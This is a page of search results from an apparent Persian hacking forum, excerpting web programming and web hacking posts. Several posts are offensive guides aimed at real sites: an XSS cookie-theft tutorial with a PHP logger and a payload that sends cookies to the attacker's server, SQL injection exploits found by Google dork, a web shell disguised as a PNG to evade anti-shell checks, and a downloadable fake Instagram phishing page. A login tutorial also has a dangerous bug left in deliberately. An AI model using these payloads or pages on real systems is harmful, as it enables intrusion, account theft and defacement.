جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'web'.
23 نتیجه پیدا شد
-
با سلام خدمت دوستان عزیز تابع file_get_contents در php یک از توابع مدیریت فایل ها در این زبان است . این تابع تمام اطلاعات داخل فایل یا url داده شده را به عنوان یک رشته می خواند . خواندن فایل: $data = file_get_contents('file.txt'); echo $data; در اینجا محتویات فایل file.txt به صورت رشته در متغیر data ذخیره میشود. خواندن فایل از ادرس: $data = file_get_contents('[Hidden Content]'); echo $data; در این کد محتوایت این ادرس که به صورت txt هست در متغیر data ذخیره و در خط دوم نمایش داده میشود. موفق و پیروز باشید.
-
با سلام خدمت دوستان عزیز امروز میخوایم باهم یک صفحه ورود بدون داشتن دیتابیس بسازیم که در کنارش صفحه ثبت نام هم موجوده و کاربران میتونن ثبت نام کنن. نوشتن صفحه ثبت نام: قدم اول :خب قدم اول توی نوشتن صفحه ثبت ناممون کد های html هست که یک فایل با نام register.php بسازید و کد های زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> در اینجا چهار input داریم که شامل نام کاربری، رمز عبور ، تکرار رمز عبور و ایمیل میشه و در نهایت یک دکمه ثبت نام. قدم دوم : یک فایل با نام users.php بسازید و این کد رو خط اول قرار بدید: <?php die('403'); ?> خب در فایل users.php اطلاعات کاربران اعم از username و password و email قرار میگیره که از تابع die اول کدمون استفاده کردیم که اگر یک نفر این فایل رو توی سایت اجرا کرد خطای 403 بگیره. قدم سوم: حالا برمیگردیم به فایل register.php که کد های php اونو بزنیم یعنی: <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } خط ۲ : از if استفاده کردیم برای بررسی اینکه کاربر دکمه register رو کلیک کرده یا نه خط ۴ : بررسی کردیم که ایا تمام ایپویت ها رو وارد کرده کاربر یا نه خط ۶ : بررسی کردیم که آیا رمز عبود و تکرار رمز عبور دقیقا یکی هست یا نه اگه آره که بریم سراغ اضافه کردن کاربر خط ۱۰ : وارد فایل users.php که قبلا ساختیم میشیم و میشه file handle ما خط ۱۳ : توی متغیر user اطلاعات کاربر رو قرار میدم یعنی نام کاربری ، رمز عبود و ایمیل که نام کاربری و رمز عبود به صورت هش شده و ایمیل به صورت encode قرار میگیره. خط ۱۶ : با تابع fwrite در آخر فایل users.php متغیر user رو اضافه میکنیم. خط ۱۹ : فایل users.php رو میبندیم خط ۲۲ و ۲۳ : نمایش خطا زمانی که تمام اینپوت ها رو کاربر وارد نکرده که میشه else شرطمون (خط ۴) کد نهایی: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } } نوشتن صفحه ورود: قدم اول: یک فایل با نام login.php بسازید و کد های html زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> (اگه دوست داشته باشید میتونید بهش استایل هم بدید ولی برای اینکه آموزش طولانی نشه ما اینکارو نمیکنیم) قدم دوم : کد های php: <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } خب به صورت کلی بخوایم توضیح بدیم که چه اتفاقی افتاده میگیم که اول چک میکنه که ایا username,password ارسال شده یا نه بعد میاد فایل users.php رو باز میکنه با mode خواندن یا read بعد متغیر users رو مساوی با داده های فایل users.php قرار میده حالا میایم دوباره متغیر users رو تعریف میکنیم و با استفاده از تابع explode هر اینتری که توی فایل هست(میشه همون متغیر users) رو توی یک اندیس ارایه قرار میدم. یک متغیر user_id هم تعریف میکنیم چون بعدا ازش میخوایم استفاده کنیم خطای undefined var نده بهمون توی for میایم روی اندیس های آرایه users کار میکنیم و با یک if دونه دونه یوزر ها رو بررسی میکنیم با هش شده ی یوزرنیمی که برامون ارسال شده بعد اگر درست بود یعنی اون اندیس یا همون خط، اطلاعات یوزر ما هست که قرارش میدیم توی user_id و البته از .= که استفاده کردیم به این معنیه : $user_id = $user_id + $users[$i]; که اگر از قبل user_id رو تعریف نمیکردیم خطا میداد و دلیل اینکه از .= استفاده کردیم این بود که قراره توی بخش های بعد ازش استفاده کنیم. خب بعد اومدیم دوباره با یک if بررسی کردیم و با تابع strstr چک کردیم که آیا پسورد (به صورت هش شده) وجود داره توی اون اندیس یا نه در واقع پسورد رو بررسی میکنیم. و اگر درست بود میایم متغیر لاگین رو مساوی با true قرار میدیم که یعنی این شخص لاگینش انجام شده. جلوتر میایم میگیم اگر login شده بود بیا توی این شرط که اول میایم ایمیل رو از اون user خارج میکنیم و میزاریم توی متغیر email که روش های مختلفی میشه این کارو انجام داد ولی من از str_replace استفاده کردم حتی از explode هم میشه استفاده کرد و... در نهایت session رو استارت کردیم و session ها رو ست کردیم که من اومدم name رو مساوی با یوزر نیم و email رو مساوی با ایمیل شخص (با توجه به یوزرنیم و پسوردی که وارد کرده) به صورت دیکد قرار دادم. و هدر کردم به پنل که شما میتونید این قسمتش رو با توجه به کاری که میخواید انجام بدید تغییر بدید. و یک else هم داریم برای زمانی که یوزر و پسورد اشتباه هست ارور بده. کد نهایی پیج لاگین: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } نکته: دوستان عزیز توی پیج ریجستر یک باگ خطرناک داریم که به شکل یک چالش میتونید بهش نگاه کنید، اگر دوستان تمایل داشتید در پایین تاپیک باگ رو ارائه بدید و همچنین نحوه پچ کردنش چون احتملا تا چند روز دیگه ادامه تاپیک نحوه بستن آسیب پذیری و نحوه استفاده از اون رو گداشتیم و یکم ریزه کاری پیج لاگین. موفق و پیروز باشید.
-
- بایگاه داده
- صفحه ورود بدون دیتابیس
- (و 18 مورد دیگر)
-
بسم الله الرحمن الرحیم ابزار جدید برای پیدا کردن صفحه ادمین این برنامه بی نقص هست و 2 هفته هست که ساخته شده انشالله بهتون کمکی کرده باشم git clone [Hidden Content] cd FalconViewer pip3 install -r requestments.txt python3 FalconViewer.py سربلند و پیروز باشید
-
سلام باز هم منم 🙂 من دیدم مطالب کد های زیادی در مورد برنامه نویسی دارم گفتم این تاپیک رو بسازم که کد ها رو داخل این تاپیک بزارم یا اگر چیزی خواستم اضافه کنم اینجا اضافه کنم که اسپم نشه تو این تاپیک قطع کد های مفید از زبان های برنامه نویسی (بیشتر زبان های برنامه نویسی وب) رو میزارم خوشحال میشم اگر شما هم کدی داشتید اینجا به اشتراک بزارید ممنون که منو تحمل می کنید 🙂 به امید موفقیت همه هکر های ایرانی 🌹
-
سلام دوستان من باز اومدم با ی تاپیک جدید راستش من خودم وقتی دیفیس می نویسم ترجیح میدم بک گراند دیفیس متحرک باشه واسه همین اکثر از گیف استفاده می کنم اما هیشه گیفت ها اندازه که ما نیاز داریم نیستن و تکرار میشن واسه همین خیلی دنبال قطع کدی گشتم تا این مشکل رو باهاش برطرف کنم تا به این قطع کد رسیدم این کد گیف شما رو بدونه تکرار در بک گراند دیفیس قرار میده html { background: url([Hidden Content]) no-repeat center center fixed; /* Link Gif */ -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover; } کد css هست برای استفاده یا باید داخل تگ style باشه یا داخل css استفاده بشه البته خودتون استاد هستید و میدونید باید چه کارکنید اما من فایل html هم سایت برای اون دست از عزیزانی که 0 کیلومتر هستن می تونن دانلود کنن ببین چجوری مورد استفاده قرار میگیره Guardiran.html تا تاپیک بعدی خدا نگهدار (^_^)
-
با سلام خدمت دوستان . در این تاپیک اکسپلویت های sql injection رو میزارم برای دوستانی که به اسیب پذیری sql injection علاقمند هستند . Exploit 1 : Web Mingo I.T. Solutions - SQL Injection vulnerability ********************************************************* #Exploit Title: Web Mingo I.T. Solutions - SQL Injection vulnerability #Date: 2020-11-10 #Google Dork: "Design & Developed By Web Mingo I.T. Solutions" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Design & Developed By Web Mingo I.T. Solutions" Demo : [Hidden Content],2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--+ [Hidden Content],version(),3,4,5,6,7,8,9--+ [Hidden Content],2,3,4,version(),6,7--+
- 24 پاسخ
-
- web security
- web
- (و 13 مورد دیگر)
-
با سلام خدمت کاربران و مدیران سایت گارد ایران در این تاپیک قصد دارم به شما آموزش دور زدن آنتی شل رو بدم که شاید بیشتر جاها بدردتون بخوره . روش اول : دو بار encode کردن شل با base64 که می توانید از این سایت کمک بگیرید . --------------- روش دوم : شل رو به فرمت png تغییر دهید . یک فایل دیگر با فرمت php بسازید و این کد رو در اون قرار دهید : <?php include_once("shell.png"); ?> تا سایت اون فایل رو با فرمت php بخونه . --------------- پیشنهاد می کنم هر دو روش رو در کنار هم انجام دهید تا انتی شلر بهتر بایپس شود . امیدوارم از این تاپیک لذت برده باشید و بدردتون بخوره و تاپیک خوبی رو گذاشته باشم .
- 1 پاسخ
-
- shell
- anti shell
-
(و 11 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت شما دوستان عزیز یکی از دوستان آموزش باگ xss رو درخواست داشت که قرار دادم . Cross Site Scripting روش کار : با دستورات javascript شما رو به یه لینک ریدایرکت می کنه و کوکی های کاربران رو به شما میده . خب حالا بریم سراغ کارمون .(فقط روی سایت هایی که باگ xss دارند میشه ) مرحله ۱ : برای مثال یه چت روم هست که پیام میدید شما توش به جای پیام این متن رو ارسال میکنید : <script>alert('Error')</script> اگر زمان واردشدن در صفحه در قالب خطا به شما error رو نمایش داد (به صورت هشدار مثلا) یعنی سایت باگ رو داره . مرحله ۲ : در یک سایت که مال خودتون هست یک فایل به نام xss.php درست کنید و این کد php رو درش قرار دهید : <?php $cookie=$_GET['c']; $fo=fopen('cookie.html','a'); fwrite($fo,'Cookie:'.$cookie.'<br><br><br>---------------------------------------<br><br><br>'); fclose($fo); ?> مرحله ۳ : در قسمت ارسال پیام یک پیام دیگر ارسال کنید دارای این کد javascript : <script>document.location="[Hidden Content]=" + document.cookie </script> یا <script>document.location="[Hidden Content]="%2bdocument.cookie </script> به جای site.com ادرس سایت خودتون رو بدید که فایل xss.php رو درش گذاشتید . مرحله ۴ : وارد این ادرس شوید : [Hidden Content] و زمانی که کاربران اون پیام شما رو می بینند ریدایرکت میشن به این ادرس site.com/xss.php و کوکی های اونا توی فایلی به اسم cookie.html برای شما زخیره می شود . نکات مهم زمان انجام این عمل : ۱- هیچ وقت روی سایت خودتون فایل ها رو نسازید چون اگر یه نفر متوجه بشه از سایتتون شکایت میکنه و.... ۲- روی سایت های ایرانی هیچ وقت انجام ندید . ۳- این باگ در جاهای مختلف سایت می تونه باشه مثل باکس جست و جو و بخش نظرات و... ۴- روش های خیلی زیادی برای استفاده از این باگ وجود دارد . اختصاصی Mr.MSA لایک فراموش نشه ! موفق و پیروز باشید .
-
با سلام خدمت دوستان عزیز گاردایران در این تاپیک قصد دارم زبان برنامه نویسی CSS رو به شما آموزش بدهم . ----------------------------------------------------------------------------------------------------------------------- ابتدا کمی با css اشنا شویم : css یک زبان برنامه نویسی تحت وب هست که بیشتر در کنار html استفاده می شود ، این زبان برای طراحی سایت از نظر ظاهری هست . برای مثال رنگ متن ها ، پس زمینه ، نوع اسکرول و ... رو با css طراحی می کنند . امروزه که بیشتر افراد به طراحی وب و برنامه نویسی تحت وب روی اورده اند زبان css می تونه زبان کاربردی باشه . پیش نیاز css ، اشنایی با زبان html هست . دیگه بیشتر از این سرتون رو درد نمیارم . 😄 ----------------------------------------------------------------------------------------------------------------------- سبک های اضافه کردن css به html : ۱- خارجی و یا External ۲- داخلی و یا internal ۳- درون خطی و یا inline که در تاپیک بعد به همراه مثال خدمتتون عرض می کنم . ----------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : اسپم ندید . سوالات رو در پ.خ ارسال کنید . کتاب و مقالات رو در اینجا ارسال نکنید . (مگر اینکه خودتون نوشته باشید) اگر قصد گذاشتن آموزشی در رابطه با css دارید ابتدا به من پیام دهید (در غیر این صورت پست شما حذف می شود ) . موفق و پیروز باشید .
- 7 پاسخ
-
- سورس
- css3
-
(و 29 مورد دیگر)
برچسب زده شده با :
- سورس
- css3
- آموزش css
- آموزش برنامه نویسی
- آموزش برنامه نویسی تحت وب
- طراحی سایت
- آموزش زبان برنامه نویسی css
- اموزش طراحی سایت
- برنامه نویس
- برنامه نویسی
- program
- programming
- web
- programmer
- site
- mr.msa
- client side
- web site
- font
- آموزش زبان برنامه نویسی css - به همراه مثال
- font-size
- font-style
- font-family
- color
- width
- height
- background
- css
- source
- background-color
- background-size
-
به دلایل امنیتی حذف شد.
-
با سلام خدمت کاربران و مدیران عزیز گارد ایران در این پست قصد دارم به شما نحوه پچ باگ RFU بدم . RFU : Remote File Upload یک توضیح مختصر : هنگام اپلود یک فایل در سرور این اسیب پذیری به وجود می اید که هکر فایل مخرب خودش رو در سرور آپلود می کند (shell) به صورت کلی این اسیب پذیری بسیار خطر ناک است و باعث می شود که هکر دسترسی کامل به سایت بگیرد ولی حالت های دیگری هم وجود دارد که خطر این باگ کمتر می شود مثلا هکر نمی تواند فایل php خودش که شل است رو آپلود کنه به جای آن فایل html خودش که دیفیس پیج است رو آپلود می کنه یه کمی توضیح طولانی شد خب حالا میریم سراغ جلو گیری از باگ RFU در کد نویسی اولین قدم باید فایل ها در یک جای مشخص و خاص باشد می توانید از این دستور استفاده کنید : move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); الان فایل های اپلودی در فولدری به نام Guardiran قرار می گیرند . حالا برای اینکه فایل های php قابل آپلود نباشند : if(end(explode('.',$_FILES['upload']['name'])) !== 'php'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } تا الان آپلودر ما کمی وضعیتش بهتر شده بعضی از سایت ها از این فیلترینگ استفاده می کنند ولی امنیت بسیار پایینی دارد چون زبان php به حروف بزرگ و کوچک حساس است یعنی ما گفتیم با در آخر نام ... php نباشد اما برای مثال هکر با این نام اپلود می کند b374k.PHP که هر دو فرمت php هستند اما از نظر حروف کوچک و بزرگ باهم فرق دارند پس کد های خودمون رو تغییر می دهیم . به این صورت : if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } الان یک اپلودر با امنیت خوب داریم ولی هنوز با بایپس ها و متد و... امکان دور زدن وجود دارد پس امنیت رو بالا تر می بریم تا کار هکر سخت تر شود . کاری می کنیم که هکر به راحتی فایل خودش رو پیدا نکنه و از تابع rand استفاده می کنیم و کد ها رو به این صورت می نویسیم : if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ $ch = rand(); move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$ch}.jpg"); }else{ } می توانید بعد از else (در غیر این صورت ) خطای خود را با html و css طراحی کنید . چند راه پیشنهادی جهت رفع بهتر باگ RFU : بهتر است که از یک سرور اختصاصی استفاده کنید و فایل های اپلودی خودتون رو در یک سرور دیگر آپلود کنید . دایرکتوری فایل های اپلود با دایرکتری فایل های اصلی متفاوت باشد . امیدوارم از این پست لذت برده باشید . Download Uploader.zip
-
برای پیدا کردن نوع دیتابیس یک سایت می توانید از افزونه های Wappalyzer و WgatRuns که در سایت هم معرفی شده استفاده کنید . در بعضی تارگت ها نمی توانید از این ها استفاده کنید و آن موقع است که از key word ها استفاده می کنیم و فقط باید یک key word را در کنار ادرس سایت قرار دهیم اگر سایت بدون هیچ مشکلی لود شد یعنی از همان دیتابیس استفاده می کند . مثال : site.com/news.php?id=1(key word) (در فایل KeyWords.txt می توانید key word های هر دیتابیس را مشاهده کنید و از آنها استفاده کنید . ) KeyWords.txt
-
بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
-
- sql injection
- sqli
-
(و 20 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت کاربران و مدیران گارد ایران در این پست قصد دارم یک سایت برای ساخت اپلیکیشن وب را به شما معرفی کنم . سایت : appyet.com نکاته قابل توجه : برنامه ها فقط برای اندروید هستند . ویژگی های زیادی دارد . دوستان توجه داشته باشید که اگر دوستی از این سایت استفاده کرد و به مشکل امنیتی برخورد حتما اطلاع دهند تا بقیه کاربران آگاه باشند .
-
- app
- application
-
(و 6 مورد دیگر)
برچسب زده شده با :
-
با سلام خدمت تمام کاربران و مدیران GUARDIRAN در این تاپیک قصد دارم یک پیج فیک اینستاگرام رو به شما دوستان عزیز بدم . فقط دوستان توجه داشته باشید که باید هر چیزی که بین این کامنت هست رو حذف کنید : <!--***************************** MR.MSA *****************************--> برای دانلود به فایل پیوست مراجعه کنید . --------------------- امید وارم از این پست لذت برده باشید و از فیک پیج اینستاگرام استفاده کرده باشید . یه مشکلات ریز داشت یه خوبی خودتون ببخشید . ******************** MR.MSA ***************** Fake Page Instagram.zip
-
با سلام خدمت انجمن گارد ایران من MR.MSA در این تاپیک قصد دارم یک افزونه دیگر تحت عنوان WhatRuns رو به شما معرفی کنم این افزونه هم یک اسکنر مانند افزونه wappalyzer است که برای جمع آوری اطلاعات بدرد بخور است . سایت افزونه => [Hidden Content] ----------------------------- بخش های جمع آوری اطلاعات و مهم WhatRuns که هنگام اسکن به شما نمایش داده می شود : - CMS - CDN - Font Script - Javascript Graphics - Web Framework - Message Board - Web Server - Rich Text Editors - Font - Javascript Frameworks - Database - Dev Tools - Message Board - Analytics - و.. ----------------------------- نکات قابل توجه : توجه داشته باشید که تمامی بخش های بالا شامل تمامی سایت ها نمی باشد چون بعضی سایت ها هستند که اطلاعات کمی می توان از آن ها بدست آورد . این افزونه سرعت نسبتا خوبی برای اسکن و انالیز سایت ها دارد و من خودم از این افزونه استفاده می کنم . ----------------------------- میزان خطای افزونه : تقریبا بین ۵ تا ۱۵ درصد میزان خطای این افزونه است . می توان گفت افزونه WhatRuns میزان خطای کمی نسبت به افزونه های دیگر دارد . ----------------------------- لینک دانلود افزونه WhatRuns : Chrome FireFox --------------------------------------------- امیدوارم از این تاپیگ لذت برده باشید و پست خوبی رو گذاشته باشم و از افزونه بهرهمند شده باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <------------------------MR.MSA----------------------> ------- باگ -------- <آموزش متد polygon در sql injection > <آموزش متد join در sql injection > <نکته مهم در متد join > ------- افزونه -------- <افزونه Wapplyzer (اسکنر سایت ) > <افزونه اسکن سایت های wordpress> <------------------------MR.MSA----------------------/>
-
با سلام خدمت شما کاربران و مدیران عزیز انجمن Guardiran من MR.MSA در این تاپیک قصد دارم یک افزونه WordPress Theme Detector and Plugin Detector برای اسکن سایت های وردپرسی را به شما معرفی کنم . ---------------------------------------------------------- ویژگی ها : نوع پوسته (them) سایت افزونه های معروف استفاده شده در سایت ورژن تم و پلاگین های سایت ---------------------------------------------------------- نکات قابل توجه : این افزونه برای بعضی از سایت های وردپرسی خوب جواب نمی دهد ولی در بعضی سایت ها بدرد بخور هست. برای ورژن تم و پلاگین خوب عمل می کند . مشکلی که این افزونه دارد این است که سرعت اسکن پایینی دارد. ---------------------------------------------------------- میزان خطا افزونه : تقریبا بین ۳۰ تا ۴۰ درصد میزان خطای این افزونه است.(طبق برسی من ) ---------------------------------------------------------- دانلود افزونه WordPress Theme Detector and Plugin Detector : Chorme FireFox ---------------------------------------------------------- امیدوارم از این تاپیگ لذت برده باشید و پست خوبی رو گذاشته باشم و از این افزونه بهرهمند شده باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************* MR.MSA ************* <------------------------MR.MSA----------------------> ------- باگ -------- <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <نکته مهم در متد join > ----- افزونه ------ <افزونه Wapplyzer (اسکنر سایت ) > ------- نرم افزار -------- <نرم افزار ریکاوری برای مک> ------- کالی لینوکس ------ <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس > <------------------------MR.MSA----------------------/>
-
با سلام خدمت شما دوستان عزیز سایت GUARDIRAN.ORG من MR.MSA در این تاپیک قراره است افزونه Wappalyzer رو به شما معرفی کنم . لینک دانلود در آخر پست . ---------------------------------------------------------- افزونه Wappalyzer اسکنر سایت است که با آن شما می توانید : ۱- نوع cms سایت ۲- افزونه های نصب شده در سایت ۳- زبان های برنامه نویسی استفاده شده در سایت و زبان برنامه نویسی اصلی سایت ۴- نوع دیتابیس سایت ۵- ورژن cms ، پلاگین ، زبان برنامه نویسی سایت . ۶- و..... رو بدست آورید . ---------------------------------------------------------- نکات قابل توجه : در بعضی از سایت ها افزونه توان پیدا کردن بعضی اطلاعات را ندارد بنابراین نمیشه گفت که تمامی اطلاعات را به شما می دهد ولی در بیشتر سایت ها امکان پیدا کردن اطلاعات وجود دارد . ---------------------------------------------------------- میزان خطای افزونه : میتوان گفت بین ۲۰ تا ۳۰ درصد این افزونه خطا دارد . ---------------------------------------------------------- لینک دانلود افزونه Wappalyzer : chrome Firefox ---------------------------------------------------------- امیدوارم از این تاپیگ لذت برده باشید و پست خوبی رو نوشته باشم و از افزونه بهرهمند شده باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > <نکته مهم در متد join > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
-
در این مجموعه ، جمع اوری اطلاعات بر پایه تارگت انسانی شکل میگیره ، و از منظر متفاوتی به دست اورد های نهایی اشاره میشه یکی از روش های سرچ افراد در اینترنت موتور های جستوجو مخصوص اشخاص محسوب میشه ، لیست زیر حاویه ادرس مجموعه نسبتا کاملی از این سایت هاست ، که در جهات مختلف عمل میکنند و با ترکیب بندی درست ازشون میشه اطلاعات نسبتا کاملی به دست اورد : [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]
- 10 پاسخ
-
- clip searching
- video search
-
(و 101 مورد دیگر)
برچسب زده شده با :
- clip searching
- video search
- video
- پیدا کردن ویدیو های مشابه
- بیرون کشیدن اطلاعات از ویدیو
- بدست اورن اطلاعات از فیلم
- image search
- meta data search
- image exif header
- dark net
- هویت تماس گیرنده
- دیپ وب
- دارک نت
- دارک وب
- جستوجو ایمیل
- deep
- جستجو در دارک وب
- جستجو کلیپ
- net
- دارک
- web
- deep web
- dark web
- dark
- user
- ردیابی بیت کوین
- user search
- username
- ردیابی ارز دیجیتال
- mobile
- phone
- bitcoin
- ceypto currency
- username finding
- phone number search
- mobile search
- mobile number search
- mobile number
- موتور جستجو تلفن
- phone number
- شماره موبایل
- تلفن
- شماره تلفن
- people
- موتور جستجو موبایل
- موتور جستجو
- موبایل
- سرچ افراد
- جستوجو
- سرچ
- جستوجو در شبکه های اجتماعی
- پیدا کردن یوزر
- social networks
- people search
- جستوجو افراد
- محیط های مجازی
- موتور جستوجو
- موتور سرچ افراد
- جستوجو نام کاربری
- ایمیل
- ارز دیجیتالی
- شبکه های اجتماعی
- e-mail search
- search
- ethereum
- بیرون کشیدن اطلاعات از تصاویر
- اطلاعات پنهان
- شماره یاب
- جرم شناسی
- ارز دیجیتال
- monero
- جمع اوری اطلاعات
- جستجو تصاویر
- deep web searching
- meta
- اطلاعات تصاویر
- data
- exif
- meta data
- exif header
- جستجو ویدیو
- جستجو فیلم
- video info
- video information
- ارشیو
- جستجو فروم ها
- جستجو فروم
- جستجو بلاگ
- ارشیو های انلاین
- سایت های ارشیو
- archive
- forum search
- forums searching
- blog search
- online archive
- information
- info
- information strategy
- information services
- استراتژی اطلاعاتی
- اطلاعات
- سازمان های اطلاعاتی
-
web vulnerability scanners - وب اسکنرها Web Vulnerability Scanners - وب اسکنرها
Mr.Nashena3 پاسخی ارسال کرد برای یک موضوع در اسکنرها و ابزارهای هکینگ
با سلام امروز میخوام در این پست ابزار بررسی امنیت سایت ها که یک هکر به آن نیاز داره رو معرفی کنم اسکنر های Web Vulnerability معمولا اسکنر هایی می باشند که به منظور پیدا کردن آسیب پذیری های یک وب سایت از آن ها استفاده میشود که با نام (WVS) نیز شناخته میشوند. نکته : سوالات خودتون رو در پستی جدا بگید در حد توان پاسخگو خواهم بود از مدیر بخش میخوام که اگه لازم میدونن پست مهم بشه- 12 پاسخ
-
- وب اسکنرها
- scanners
-
(و 5 مورد دیگر)
برچسب زده شده با :
-
درود به احتمال زیاد اکثر شما با کرولر ها آشنایی دارید ولی توضیحی میدم برای کسایی که نمیدونن وب کراولر ها برای افراد معمولی مثل ما ابزار هایی برای پیدا کردن تمام url هی یک سایت هستند البته این فقط برای ما هست و کمپانی های بزرگ که کراولر های قوی دارند کاری بیش از این انجام میدن ( مثل گوگل و یاهو) این کراولر که میزارم کم حجم و قوی هست و نصبت به سایتی که شما بهش میدین (وسرعت نت) از چند دقیقه تا چند روز ممکنه طول بکشه ورژن مورد نیاز پایتون : 2.7 روش اجرا: دایرکتوری فایل رو تو cmd یا terminal بنویسین و بعد با یک فاصله url سایت رو بنویسین تا تمام سایت رو دانلود کنه توصیه میکن بعد اجرا یه چای بریزید بخورید چون معلوم نیس چه قد طول بکشه webcrawler.zip
-
سلام میشه چند تا گروه امنیتی خارجی بگین جواب اینجا رو بدید ممنون میشم گیر کردم [Hidden Content]